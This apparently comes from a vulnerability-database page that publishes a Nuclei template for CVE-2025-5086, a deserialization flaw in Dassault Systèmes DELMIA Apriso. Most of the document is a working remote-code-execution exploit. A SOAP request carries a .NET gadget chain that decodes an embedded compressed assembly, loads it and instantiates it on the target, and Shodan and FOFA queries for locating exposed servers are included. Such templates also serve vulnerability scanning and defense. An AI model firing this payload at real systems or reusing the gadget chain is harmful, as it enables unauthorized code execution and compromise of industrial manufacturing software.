漏洞描述
A deserialization of untrusted data vulnerability affecting DELMIA Apriso from Release 2020 through Release 2025 could lead to a remote code execution.
CVE-2025-5086: Dassault Systèmes DELMIA Apriso (up to 2025) - Insecure Deserialization
PoC代码[已公开]
id: CVE-2025-5086
info:
name: Dassault Systèmes DELMIA Apriso (up to 2025) - Insecure Deserialization
author: hacktronai,iamnoooob,pdresearch
severity: critical
description: |
A deserialization of untrusted data vulnerability affecting DELMIA Apriso from Release 2020 through Release 2025 could lead to a remote code execution.
reference:
- https://www.hacktron.ai/blog/posts/dassault-delmia-apriso-rce/
- https://www.3ds.com/vulnerability/advisories
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9
cve-id: CVE-2025-5086
cwe-id: CWE-502
epss-score: 0.63948
epss-percentile: 0.98374
metadata:
verified: true
max-request: 1
shodan-query: html:"apriso"
fofa-query: body="/Apriso/Portal"
tags: cve,cve2024,delmia,apriso,serialization,rce,kev,vkev
http:
- raw:
- |-
POST /apriso/WebServices/FlexNetOperationsService.svc/Invoke HTTP/2
Host: {{Hostname}}
Content-Type: text/xml
Soapaction: "http://tempuri.org/IFlexNetOperationsService/Invoke"
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<Invoke xmlns="http://tempuri.org/">
<ArrayOfstring z:Id="1" z:Type="System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"><Count z:Id="2" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Count><Comparer z:Id="3" z:Type="System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]" z:Assembly="0" xmlns=""><_comparison z:Id="4" z:FactoryType="a:DelegateSerializationHolder" z:Type="System.DelegateSerializationHolder" z:Assembly="0" xmlns="http://schemas.datacontract.org/2004/07/System.Collections.Generic" xmlns:a="http://schemas.datacontract.org/2004/07/System"><Delegate z:Id="5" z:Type="System.DelegateSerializationHolder+DelegateEntry" z:Assembly="0" xmlns=""><a:assembly z:Id="6">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly><a:delegateEntry z:Id="7"><a:assembly z:Ref="6" i:nil="true"/><a:delegateEntry i:nil="true"/><a:methodName z:Id="8">Compare</a:methodName><a:target i:nil="true"/><a:targetTypeAssembly z:Ref="6" i:nil="true"/><a:targetTypeName z:Id="9">System.String</a:targetTypeName><a:type z:Id="10">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type></a:delegateEntry><a:methodName z:Id="11">Parse</a:methodName><a:target i:nil="true"/><a:targetTypeAssembly z:Id="12">PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</a:targetTypeAssembly><a:targetTypeName z:Id="13">System.Windows.Markup.XamlReader</a:targetTypeName><a:type z:Id="14">System.Func`2[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type></Delegate><method0 z:Id="15" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0" xmlns="" xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection"><Name z:Ref="11" i:nil="true"/><AssemblyName z:Ref="12" i:nil="true"/><ClassName z:Ref="13" i:nil="true"/><Signature z:Id="16" z:Type="System.String" z:Assembly="0">System.Object Parse(System.String)</Signature><Signature2 z:Id="17" z:Type="System.String" z:Assembly="0">System.Object Parse(System.String)</Signature2><MemberType z:Id="18" z:Type="System.Int32" z:Assembly="0">8</MemberType><GenericArguments i:nil="true"/></method0><method1 z:Id="19" z:FactoryType="b:MemberInfoSerializationHolder" z:Type="System.Reflection.MemberInfoSerializationHolder" z:Assembly="0" xmlns="" xmlns:b="http://schemas.datacontract.org/2004/07/System.Reflection"><Name z:Ref="8" i:nil="true"/><AssemblyName z:Ref="6" i:nil="true"/><ClassName z:Ref="9" i:nil="true"/><Signature z:Id="20" z:Type="System.String" z:Assembly="0">Int32 Compare(System.String, System.String)</Signature><Signature2 z:Id="21" z:Type="System.String" z:Assembly="0">System.Int32 Compare(System.String, System.String)</Signature2><MemberType z:Id="22" z:Type="System.Int32" z:Assembly="0">8</MemberType><GenericArguments i:nil="true"/></method1></_comparison></Comparer><Version z:Id="23" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2" xmlns=""><string z:Id="25" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><string z:Id="26" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><ResourceDictionary
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:s="clr-namespace:System;assembly=mscorlib"
xmlns:r="clr-namespace:System.Reflection;assembly=mscorlib"
xmlns:i="clr-namespace:System.IO;assembly=mscorlib"
xmlns:c="clr-namespace:System.IO.Compression;assembly=System"
>
<s:Array x:Key="data" x:FactoryMethod="s:Convert.FromBase64String">
<x:Arguments>
<s:String>H4sIAAAAAAAEAO1WzW8bVRD/reO0jtNYSQulEVXZ1ClK+Vg5jYNKhUgaO61D86U4dStUKVmvX5Ot1rur3efEyQEqIapy41AhcUAcuPRQQQ+VqCohITj1EIkDXDj1D0DiwAUQIsx7u/6IY9RcUCWUcXbezLyZN795n5l592N0AIjSt70NPERA43g63aQv8dKjBB50bQ08VKa3BhZXTV91PWfF08uqodu2w9UiU72KrZq2mp3Lq2WnxLSenvhgOMb8JDCtdOD70bHV2rhPEBnoVrqBAwg+ohMiQK0D65VyJMANNFoJKhKIHRj/ULiKv0ZbbyT9kAQuhQXfjbQpchk4tIe52EWEL9akxkjPNekaZ1VO7WA08JV1tuQn87Lm+Z6BEBthlIXGdvqReVzzmOUYIdblcKxDu/wmduEMFyInQzpRpaRXaUMoeyixHX0SGaLo+BDBjDudglFhcY+Gcz2aatc5SOorBCT/zoQSZhEw19JaShtJjQy/KSydsIgfp+7ke8BtageFnOeeaa/4wuNeJJiO5OU8fokEa5q8eHkqS+1fpF8T+oTlFENcZFIuPgd0CeXPUyM4GtRYm3YhH2ySO2RUPER4AKdxkngBbxBfIx7HXXxG/FviCfyBn6WfEnLx68ULshIhz6vCfutYSo7YhxTF9ENoXZIP4AGOE9+i7zR6lJcxjH7lVWjoJknDEZxD9GbrXN9B076Xeftl22w7QvhabQrVUqe3ZpxSxWJv4/q6yaubqWGtZFmYRNk3HM8yi8hv+JyVMVe8wQwOzeCOF9q0hYrNzTLTMk7ZNS3m5Zm3ZhrMR2DQuenYC8zSq1Lyz3Nav2KFM4SBwo26iqZl8o1Gbw1JLc0VVkSOczfj2PLUrDC+lKl4HrO5tC8w36XhmeyoK2FwxrEsAi7ya3mXGaZumZushFm9zAq6VWENBxmfY3qJeT58kqdE4UQD8/Dg4AYYDHBkYcInyaGdwKhnA3jRkPLrOEPreQajJI2SdJZ2ioJPv/rxg+SdL3O3fvvi5KPH332O2Neb1wr96ScfdahQoqqixGL3x5be7/spfo7W6XBfVMXh5wXr71QjSiIRU8Ijf0JspsXI0Sue7s469mTVYK5AvrjqOeu+2H2/JxtLm6jdme2odgFjKeN4Wcua0U07WHTG5BYQtH2K4nv/ZYR9+t+RIhf7WPCK7rCLvZVqYxck3o6r4/SON71f05E08QLyWCI+iQWSpjCHWdKniF8gWdA30V//bvfajIWtuLdan+WszFyATmfvAp1Fi07eFGxcpxMpaFBGLVKvTlaf+nU6tSb12uEI96P3FDFGnuwe9dDRbzPSbemTqv/SKIo5wGuESKn7Z+kTt4EYx92RR5VzFmvyLcj7wm/ySdHt3vjoOkYP+QsMXPrahN2i+dJRJh2EbJ2iOarYJH/xNpSoPzitQxLXNPmtyKgMZXHpdhLIVrAKHmLKyhxzod0Mc9Qw2nvKlZZ1BfdiCRV5L7ZW11rbWRlznjx88izTbFqETn1q3D79h6QG/3+p6WcNZJ+eBf0DwmVsFgAOAAA=</s:String>
</x:Arguments>
</s:Array>
<i:MemoryStream x:Key="inputStream">
<x:Arguments>
<StaticResource ResourceKey="data"></StaticResource>
</x:Arguments>
</i:MemoryStream>
<c:GZipStream x:Key="gzipStream">
<x:Arguments>
<StaticResource ResourceKey="inputStream"></StaticResource>
<c:CompressionMode>0</c:CompressionMode>
</x:Arguments>
</c:GZipStream>
<s:Array x:Key="buf" x:FactoryMethod="s:Array.CreateInstance">
<x:Arguments>
<x:Type TypeName="s:Byte"/>
<x:Int32>3584</x:Int32>
</x:Arguments>
</s:Array>
<ObjectDataProvider x:Key="tmp" ObjectInstance="{StaticResource gzipStream}" MethodName="Read">
<ObjectDataProvider.MethodParameters>
<StaticResource ResourceKey="buf"></StaticResource>
<x:Int32>0</x:Int32>
<x:Int32>3584</x:Int32>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
<ObjectDataProvider x:Key="asmLoad" ObjectType="{x:Type r:Assembly}" MethodName="Load">
<ObjectDataProvider.MethodParameters>
<StaticResource ResourceKey="buf"></StaticResource>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
<ObjectDataProvider x:Key="types" ObjectInstance="{StaticResource asmLoad}" MethodName="GetTypes">
<ObjectDataProvider.MethodParameters/>
</ObjectDataProvider>
<ObjectDataProvider x:Key="firstType" ObjectInstance="{StaticResource types}" MethodName="GetValue">
<ObjectDataProvider.MethodParameters>
<s:Int32>0</s:Int32>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
<ObjectDataProvider x:Key="createInstance" ObjectInstance="{StaticResource firstType}" MethodName="InvokeMember">
<ObjectDataProvider.MethodParameters>
<x:Null/>
<r:BindingFlags>512</r:BindingFlags>
<x:Null/>
<x:Null/>
<x:Null/>
<x:Null/>
<x:Null/>
<x:Null/>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary></string></Items></ArrayOfstring>
</Invoke>
</s:Body>
</s:Envelope>
matchers:
- type: dsl
dsl:
- 'contains(projectdiscovery, "cve-2025-5086")'
- 'contains(content_type, "text/xml")'
- 'status_code == 500'
condition: and
# digest: 4a0a00473045022100c2003e9b4480b51887167467134641d9df2ec5e8a401215baae227e2f329f1d302207ccd4062cfc716c4a857d08b84903c23fa047d303bedc7d7d1439d1bc7e628fb:922c64590222798bb761d5b6d8e72950